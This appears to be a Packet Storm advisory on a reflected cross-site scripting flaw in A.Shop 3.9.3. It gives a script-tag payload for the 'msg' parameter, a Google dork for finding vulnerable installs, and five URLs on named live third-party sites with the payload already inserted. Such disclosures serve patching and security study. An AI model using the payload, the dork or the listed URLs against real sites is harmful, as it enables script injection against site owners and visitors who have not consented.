A.Shop version 3.9.3 suffers from a cross site scripting vulnerability.
e75752208b94e3a6392e7c18db6330f03f0d0bf8b28f922e23aa7657c3a605da######################
# Exploit Title : A.Shop 3.9.3 Cross Site Scripting
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.ashopsoftware.com/tour-dx/shopping-cart-catalog.htm
# Google Dork : inurl:"/ashop/catalogue.php?cat= "
# Date: 2016/02/12
# Version = 3.9.3
######################
# PoC:
# msg=[XSS]
# Payload = <script>alert(1);</script>
#
# http://www.coloradotrees.org/ashop/catalogue.php?msg=%3Cscript%3Ealert%281%29;%3C/script%3E
# https://www.barmon.com/ashop/catalogue.php?msg=%3Cscript%3Ealert%281%29;%3C/script%3E
# http://www.bedfordrecordings.com/ashop/catalogue.php?msg=%3Cscript%3Ealert%281%29;%3C/script%3E
# http://www.ffbookstore.com/ashop/catalogue.php?msg=%3Cscript%3Ealert%281%29;%3C/script%3E
# http://www.financialforuminc.com/ashop/catalogue.php?msg=%3Cscript%3Ealert%281%29;%3C/script%3E
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
# Homepage : persian-team.ir
######################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed